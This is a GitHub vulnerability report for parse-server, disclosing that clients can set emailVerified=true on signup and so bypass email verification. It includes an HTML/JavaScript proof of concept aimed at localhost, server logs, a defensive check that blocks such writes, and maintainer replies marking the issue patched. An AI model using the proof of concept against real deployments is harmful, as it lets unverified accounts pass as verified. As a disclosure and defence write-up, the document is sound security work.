Vulnerability: Email verification can be circumvented #3393

Closed
haapaan opened this issue Jan 18, 2017 · 2 comments


haapaan commented Jan 18, 2017

A user who has just signed up can set emailVerified=true without actually verifying the email address. In other words, the user does not have to click the link in the email to get his/her email validated.

Steps to reproduce

Steps that reproduce the issue:

  1. Set the following settings in the server.js:
    verifyUserEmails: true,
    emailVerifyTokenValidityDuration: 2 * 60 * 60,
    preventLoginWithUnverifiedEmail: true,

  2. Sign up, set emailVerified: true and save the user. Here is a sample HTML page that does just that:

<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"></script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
    Parse.initialize('e5c10b31d8716509af3e571260');
    Parse.serverURL = 'http://127.0.0.1:8888/parse';

    var user = new Parse.User();
    user.set("username", "hacker");
    user.set("password", "passwd");
    user.set("email", "hacker@example.com");

    user.signUp(null, {
        success: function(user) {
            // Signup succeeded
            alert("Signup succeeded");
            // Try hack emailVerified to true (should not succeed)
            user.set("emailVerified", true);
            user.save(null, {
                success: function(userAgain) {
                    // Execute any logic that should take place after the object is saved.
                    alert('Save succeeded');
                },
                error: function(userAgain, error) {
                    alert('Save failed with ' + error.message);
                }
            });
        },
        error: function(user, error) {
            // Show the error message somewhere and let the user try again.
            alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
        }
    });
}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>

Expected Results

Save should fail or at least emailVerified should still be false in the database for this user.

Actual Outcome

emailVerified is true in the database for this new user.

Environment Setup

  • Server

    • parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
    • Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost
  • Database

    • MongoDB version: v3.0.9. This issue is also reproducible with Postgresql 9.4.
    • Storage engine: default
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost

Logs/Trace

verbose: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "hacker@example.com"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=
, email=hacker@example.com
verbose: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
verbose: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
verbose: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z
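
The behaviour the report expects (a client write to emailVerified is refused, a master-key write is not) can be expressed as a server-side check like the one below. This is an added example, not part of the original issue and not parse-server's own code or the patch referenced in this thread; the request shape `{ method, path, isMaster, body }`, the function names and the field list are assumptions made for illustration.

```javascript
'use strict';

// Fields on _User that only the server (master key) may write.
// Assumed list for this example; the issue names only emailVerified.
const SERVER_ONLY_USER_FIELDS = ['emailVerified'];

// Matches the two REST routes seen in the log: /parse/users and /parse/classes/_User
const USER_ROUTE = /^\/parse\/(users|classes\/_User)(\/|$)/;

// Decide whether a REST write may proceed.
// req is a hypothetical shape: { method, path, isMaster, body }.
function checkUserWrite(req) {
  const isWrite = req.method === 'POST' || req.method === 'PUT';
  if (!isWrite || !USER_ROUTE.test(req.path) || req.isMaster) {
    return { ok: true, blocked: [] };
  }
  const body = req.body && typeof req.body === 'object' ? req.body : {};
  // Presence of the key is enough to refuse, whatever value the client sent.
  const blocked = SERVER_ONLY_USER_FIELDS.filter((f) =>
    Object.prototype.hasOwnProperty.call(body, f)
  );
  return { ok: blocked.length === 0, blocked };
}

// Constructed requests modelled on the log above (not captured traffic).
const SAMPLE_REQUESTS = [
  // Plain signup: allowed.
  { method: 'POST', path: '/parse/users', isMaster: false,
    body: { username: 'hacker', password: 'passwd', email: 'hacker@example.com' } },
  // The PUT from the report: refused.
  { method: 'PUT', path: '/parse/classes/_User/cyl7z1XcSe', isMaster: false,
    body: { emailVerified: true } },
  // Same field supplied at signup time: refused as well.
  { method: 'POST', path: '/parse/users', isMaster: false,
    body: { username: 'u2', password: 'pw', email: 'u2@example.com', emailVerified: true } },
  // Master-key write (e.g. the server's own verification handler): allowed.
  { method: 'PUT', path: '/parse/classes/_User/cyl7z1XcSe', isMaster: true,
    body: { emailVerified: true } },
];

function evaluateSamples() {
  return SAMPLE_REQUESTS.map((r) => checkUserWrite(r).ok);
}

console.log(evaluateSamples());
```
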

@flovilmart
Contributor

Thanks for reporting, we'll have a look shortly.

@montymxb
Contributor

Closing as patched in #3681
